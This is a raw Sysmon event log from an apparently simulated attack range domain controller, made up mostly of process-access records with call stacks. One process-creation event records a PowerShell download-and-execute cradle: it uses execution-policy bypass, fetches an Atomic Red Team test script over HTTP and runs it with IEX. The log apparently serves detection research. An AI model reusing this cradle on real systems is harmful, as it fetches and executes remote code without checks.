64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203424Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000002203548Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.877{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E9C2-6040-4F4E-00000000AD01}4268C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203547Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.877{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203546Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.877{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203545Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.877{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203544Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.877{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203543Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.877{5ABCFE62-842D-603E-0500-00000000AD01}416340C:\Windows\system32\csrss.exe{5ABCFE62-E9C2-6040-4F4E-00000000AD01}4268C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203542Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.877{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E9C2-6040-4F4E-00000000AD01}4268C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203541Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.878{5ABCFE62-E9C2-6040-4F4E-00000000AD01}4268C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002203540Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.784{5ABCFE62-842F-603E-0F00-00000000AD01}2961448C:\Windows\system32\svchost.exe{5ABCFE62-E9C2-6040-4E4E-00000000AD01}2808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203539Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.784{5ABCFE62-842F-603E-0F00-00000000AD01}2961296C:\Windows\system32\svchost.exe{5ABCFE62-E9C2-6040-4E4E-00000000AD01}2808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203538Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.752{5ABCFE62-842D-603E-0B00-00000000AD01}6321072C:\Windows\system32\lsass.exe{5ABCFE62-E9C2-6040-4E4E-00000000AD01}2808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203537Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.752{5ABCFE62-842D-603E-0B00-00000000AD01}6321072C:\Windows\system32\lsass.exe{5ABCFE62-E9C2-6040-4E4E-00000000AD01}2808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002203536Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-CreatePipe2021-03-04 14:08:02.737{5ABCFE62-E9C2-6040-4E4E-00000000AD01}2808\PSHost.132593404826809570.2808.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002203535Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.721{5ABCFE62-E9C2-6040-4E4E-00000000AD01}2808ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_aitq5pwr.0cu.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203534Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.721{5ABCFE62-E9C2-6040-4E4E-00000000AD01}2808ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_bsuqoxaa.2pr.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002203533Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.705{5ABCFE62-E9C2-6040-4E4E-00000000AD01}2808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_bsuqoxaa.2pr.ps12021-03-04 14:08:02.705 10341000x80000000000000002203532Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.705{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-E9C2-6040-4E4E-00000000AD01}2808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203531Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.674{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E9C2-6040-4E4E-00000000AD01}2808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203530Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.674{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203529Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.674{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203528Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.674{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203527Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.674{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203526Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.674{5ABCFE62-99F1-603E-7907-00000000AD01}30803060C:\Windows\system32\csrss.exe{5ABCFE62-E9C2-6040-4E4E-00000000AD01}2808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203525Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.674{5ABCFE62-E9C2-6040-4D4E-00000000AD01}63364080C:\Windows\system32\cmd.exe{5ABCFE62-E9C2-6040-4E4E-00000000AD01}2808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203524Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.680{5ABCFE62-E9C2-6040-4E4E-00000000AD01}2808C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5ABCFE62-E9C2-6040-4D4E-00000000AD01}6336C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"" 10341000x80000000000000002203523Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.674{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E9C2-6040-4D4E-00000000AD01}6336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203522Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.674{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9C2-6040-4D4E-00000000AD01}6336C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF8172E9FF3) 10341000x80000000000000002203521Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:02.674{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203520Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 